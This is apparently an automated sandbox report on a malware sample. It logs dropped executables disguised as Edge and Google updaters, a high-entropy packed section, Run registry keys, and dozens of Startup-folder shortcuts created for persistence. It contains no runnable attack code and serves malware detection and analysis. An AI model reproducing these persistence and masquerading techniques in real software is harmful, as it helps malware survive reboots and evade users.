Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 3_2_050E5EE7 pushfd ; retf	3_2_050E5EF9
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_05257F48 pushad ; iretd	4_2_05257FA1
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 4_2_05255EE7 pushfd ; retf	4_2_05255EF9
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_0520801D push es; ret	11_2_0520801E
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_05207F10 push cs; ret	11_2_05207F16
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_05207F48 pushad ; iretd	11_2_05207FA1
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_05207FA8 push esp; iretd	11_2_05207FA9
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 11_2_05205EE7 pushfd ; retf	11_2_05205EF9
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_04887FA2 push esp; iretd	15_2_04887FA9
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Code function: 15_2_04887F58 pushad ; iretd	15_2_04887FA1
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_04AC5EE7 pushfd ; retf	18_2_04AC5EF9
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Code function: 18_2_04AC7F48 pushad ; iretd	18_2_04AC7FA1

Source: file.exe	Static PE information: section name: ."Rv entropy: 7.004647399293236
Source: LKMService.exe.0.dr	Static PE information: section name: ."Rv entropy: 7.004647399293236
Source: GoogleUpdater.exe.2.dr	Static PE information: section name: ."Rv entropy: 7.004647399293236

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe			Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\Desktop\file.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LKMService_047c5762224547e8b0906f5148be419e			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LKMService_773ee3bb9e0f4071afc0e6a7986206d0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_55c2eb9fb8194b3183dae4b65fdda1b5.lnk

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_55c2eb9fb8194b3183dae4b65fdda1b5.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ec7e774008154f3596c8e5c3ca65b43a.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8b0b963caf834d029f35df17c1c436c7.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1bc86309aad64beaaba50da47f1fe248.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7a283f2dc44047f9b90f76f7687c84db.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_385556207e4d49bb88bb33a72ac98a68.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7e8ecf4f001c41edb4100bd58d1d004f.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9e92297ac52847c3a122730984e5abd1.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d5b565aee0b842f89c22c5f172678df9.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_aa8be52a868740eab8f8ec82641ac0c1.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f619a40d28e44231bbc0b75adc7e6593.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3a7884e208224a6c873f89801ccde078.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_70b4bf6c89434abb9c4a92d4a3107a31.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a37d9ccfb0194adf8213dc3f6997f78f.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3334419e53b3488ca85ae4de076f47dc.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_621b8830c943464c9d47e42d99b46857.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a0df83e3640e4d8d8bc92cc51336f2f5.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1260347513fa42eb8dbca954b1f9766f.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_30649bb19ccb493bae273224706f8bba.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7b11985b0f4a44efbcfa9ebcdda85610.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f259adaf5ff645509c195bf263dfd55e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c894375b99af48eb88116328de9ffb98.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_856eb967065a4a3faa5cc998ae92f005.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_0f1fdcd72fa2443cb400c03502902fe9.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8127c9e300df4816a3f8c0b347934bf0.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e64ab677b62d4831a2902f3e6bff49df.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d97d239314814309aa82de22ff2626e0.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d9ae47459b854ee78156fea739ee2eba.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f398b917ebdf42d684e3df08d449596d.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d550e8040e9f44f19bffddc3e8e06d5e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_28a5b517ff724da4be16ea4aaf5a357c.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ed539e9b377a47aebbf43d3ea0cb839e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7d29b77eb5544048bf84a48c0bc966be.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a97a4cd7e177496cae1d18f2d60edeb6.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_fff188210d924c868774a26b37b1f9c9.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_acbb346df900467ebd8c2c0ce13844f9.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2d07a0547ac04ab9af7372ee910ba6b1.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b87af243048a4cb58e7fbbcc09d4d0bb.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_687a9749c9a44df689e436ec246c5fcc.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_92fa881b504c497db058025dd6cb3bc4.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7172ee7a982744218b205a6832554ab3.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_17b0682e31094ae8b61542e0fc483319.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8f3c4b00bddc456e9c6e890ed0339b68.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_111bb590f9e24471b247ca4b4d7fd194.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c460e1bb0908400c8719e2ff6efc6472.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_255ec7c5f6124168899ab52eb1fb3db9.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ee6262db977148f9b6ce41041a0fbdf7.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_46234ffc04244b23ac4dc3e0979a0b7d.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_41851dcfce50420bb4154e63f25f2a8e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5f419d2562814795914a60f7e574128b.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ba60f2e1542943c49cb63fcb463703a8.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9dac438bfec04a60812adddf7761318f.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f5a844d131a542409d15c7be5595addc.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e473bf015e6148daa821e9cdba096597.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_513aa6e3c652483682fd1f51e46a8bd3.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c365a14f7cc645439df5ba22b5f10906.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_38b12ffdc3054b75a4cc42355d27321a.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6bbe8cc63bcf4ed199794d58d51e869f.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_88f655959b0548ed994a963bf2f1d4d9.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_80b58aa1ecd34f41b1ed729e00929f51.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_baaca187cd3746ad83aad8ceea07a8c5.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d827f342fe9c4f3d948a33ec240811fd.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2d708224935546eb848b785f0206ad51.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_270b1265d8e74892bac3d731d24190c0.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_59312c45173e49bd8b855b176d5a495f.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_284cd24aa4e1493cb8422375a300e535.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_75bc3afdb6384591b03d648ecbb02287.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e4c3b32db63d4c3385d74139e1cfcce9.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9b99dd99249a49b197b20c73f033070f.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5589ec67c0e2448ca25656e7e16c73e3.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_958c0b6e979e435bb4f60be1aee3dd03.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_fc51083f46e44479828e6d9a79b9bb37.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a808b141de384ba28209e8f85ffef996.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_526295f827514b53bd18028cd35e87bd.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_dd48efc11113448d9c44e8a8c157ad39.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_73b75d6015d7483b9bdcb14e44c1505c.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c6c8adfab8504d9095f55a114049f3d3.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7854577d09e6431c88169fff1770e32e.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_0792a7c0e50544d6a4b11823b693efec.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a91dde4ec0654d5faa715ea0cd5636bb.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3e7aec97c8bc4c58bc7e320cf8c9aed1.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ca5d77cba2b7460a9aed12793456440c.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5aba0e48cc6c41bfa9cec8d6d308f4e7.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f5ff322f4090403981ac575d9069d8a6.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f8222af956df4e9392ff70bf6cb8c75f.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_cfdb367c887a433aa95af059e0afbe21.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_55d106e32ce949238a924c643bdcf373.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_26b5f12dcabf46c3b77f132db9dad925.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3db40f8d96c747958926b1eb567e5bd4.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_be81e1a44f8f4c5f9242ff357075b5d3.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a278fa9619bf4a8490c564cef196d074.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_02e8a991ef3544eabda639153e7216b6.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_952cc57250e64b97b914a2957a5939ed.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_713d13d93ba54ba4a2bee5c605c845a3.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9707391c32974477b52700f130ac1cb7.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_65b508a372044eed8b833fd4041f8819.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e223acbd469940358b359937201eb9b2.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d14ccb5487c8433d95506ecb32cb2690.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8aa4e48ffd54477592e44b825a1ff1b6.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6d603333c2b541768926d493700133a8.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_13feffee078442b98f35e9a38ad41756.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d9e42d35c8e343bdb56129036edf99d4.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_25338c699d96421aaf0a1ba93df7312c.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c36777343f8646bc9f8bb6efc22ef9b8.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_804cc7eb4d3c4c02a2c32d147219089a.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6231bf02d45e427bbb9b828041a02394.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_62cafd5f07ce4a59b8e60ed14dc1f8db.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_56db164c9f4845029d70161044c07596.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_4cf4ef635c4442808a5c60a03abd63ad.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_878d667d16cd425ca300e21a7c362397.lnk	Jump to behavior
